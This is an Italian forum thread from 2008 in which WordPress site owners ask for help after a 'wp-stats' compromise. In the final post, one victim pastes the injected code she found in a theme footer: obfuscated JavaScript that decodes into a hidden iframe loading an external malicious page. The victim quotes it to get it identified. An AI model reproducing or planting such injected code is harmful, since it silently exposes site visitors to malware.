Navigazione

    Privacy - Termini e condizioni
    © 2020 Search On Media Group S.r.l.
    • Registrati
    • Accedi
    • CATEGORIES
    • Discussioni
    • Non letti
    • Recenti
    • Hashtags
    • Popolare
    • Utenti
    • Stream
    • Interest
    • Categories
    1. Home
    2. Categorie
    3. Coding e Sistemistica
    4. CMS & Piattaforme Self-Hosted
    5. Ho subito un attacco dal "virus" wp-stats, come risolvo?
    Questa discussione è stata cancellata. Solo gli utenti con diritti di gestione possono vederla.
    • P
      pluginguy User Attivo • 1 giu 2008, 20:57 ultima modifica di

      Ho subito un attacco dal "virus" wp-stats, come risolvo?

      Ciao per favore andate a visitare viva rovere punto it
      Penso di essere stato attaccato da un worm, da un bot malefico.. chiamatelo come vi pare 😢
      Fatto sta che l' interfaccia grafica si è ridotta a zero, e non possono nemmero entrare nell' admin.
      Quello che ho potuto notare, accedendo all' FTP, è che sono stati aggiunti molti file sul mio spazio web.
      ad esempio fx_admin-ajax.p
      e qui ho una prima domanda: Ho sbagliato ad impostare i permessi CHMOD?

      Vabbè, ormai il danno è subito.
      Non ho trovato informazioni su google per arrivare a una soluzione.

      Volendo aggiornare alla 2.51, per ripararare eventuali falle nella sicurezza della mia 2.3,

      ho fatto il backup di database e di tutti i file ad oggi presenti, compresi quelli "fasulli"

      Purtroppo
      non ho fatto recentemente un backup dei file del sito, quindi non riesco a capire bene quale files dovrei eliminare.

      Per completare l' aggioramento, mi manca un passaggio che non so se è davvero fondamentale: disattivare tutti i plugin. Come detto, mi è impossibile.

      Se avete un po' di pazienza, aiutatemi 😞

      0 Miglior Risposta Ringrazia Cita Rispondi

        1 Risposta Ultima Risposta
        Caricamento altri post
        Rispondi
        • Topic risposta
        Effettua l'accesso per rispondere
        • Da Vecchi a Nuovi
        • Da Nuovi a Vecchi
        • Più Voti
         

      • B
        bloggare User Attivo • 2 giu 2008, 07:44 ultima modifica di

        Ciao, non ho mai avuto a che fare con un problema del genere, cmq ho trovato questi due articoli, spero di possano aiutare:

        wordpress.org/support/topic/151888

        jasonmorrison.net/content/2008/fixing-a-this-site-may-harm-your-computer-warning-part-2-hidden-iframes/

        fammi sapere, ciao

        0 Miglior Risposta Ringrazia Cita Rispondi

          1 Risposta Ultima Risposta
        • P
          pluginguy User Attivo • 2 giu 2008, 11:02 ultima modifica di

          Ti ringrazio bloggare, putroppo le indicazioni che vengono date da quei pos le ho già lette: rimuovere l' iframe oppure aggiornare il blog...
          ma nessuno parla di files inseriti sullo spazio web

          Io procedo, senza disattivare i plugins e non eliminando nessun "merdaceus" file

          0 Miglior Risposta Ringrazia Cita Rispondi

            1 Risposta Ultima Risposta
          • P
            pluginguy User Attivo • 2 giu 2008, 18:31 ultima modifica di

            risolto, ma ti pareva... non era mica la banale cosa che è successa a tutti.Ho dovuto fare da solo, un intero pomeriggio, passando per db e altre cose più grande di me. Una cosa l' ho imparata: backup e aggiornamenti, sempre, comunque, dovunque. Quantunque?

            0 Miglior Risposta Ringrazia Cita Rispondi

              1 Risposta Ultima Risposta
            • S
              silvana57 User • 5 giu 2008, 16:05 ultima modifica di

              @pluginguy said:

              risolto, ma ti pareva... non era mica la banale cosa che è successa a tutti.Ho dovuto fare da solo, un intero pomeriggio, passando per db e altre cose più grande di me. Una cosa l' ho imparata: backup e aggiornamenti, sempre, comunque, dovunque. Quantunque?
              io ho lo stesso tuo problema, magari se dai qualche indicazione su come risolvere L'attacco è un virus wp-stats.htm. grazie
              Siccome è la seconda volta che mi succede, sono convinta che non è sufficiente togliere i codici inseriti (come fanno poi?) ma deve esserci anche qualcosa da settare nei permessi a livello di hosting (io ho tophost)
              il mio sito infetto (calicidistelle.it) è un sitarello che ho fatto per gioco con un amico non è importante ma il mio della firma si, se dovesse succedermi anche su quello non ci dormirei. meglio prevenire che curare
              ringrazio chi mi da una mano e anche Paolino per gli interventi 1100-siti-italiani-infettati-da-malware

              0 Miglior Risposta Ringrazia Cita Rispondi

                1 Risposta Ultima Risposta
              • S
                silvana57 User • 5 giu 2008, 16:18 ultima modifica di

                ho trovato questo nel footer di un template che non usavo, ringrazio di nuovo paolino che mi ha dato la dritta.

                
                <?php get_footer(); ?><?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>
                ```:o mi sa che è lui, mi confermate?
                0 Miglior Risposta Ringrazia Cita Rispondi

                  1 Risposta Ultima Risposta
                Caricamento altri post
                Rispondi
                • Topic risposta
                Effettua l'accesso per rispondere
                • Da Vecchi a Nuovi
                • Da Nuovi a Vecchi
                • Più Voti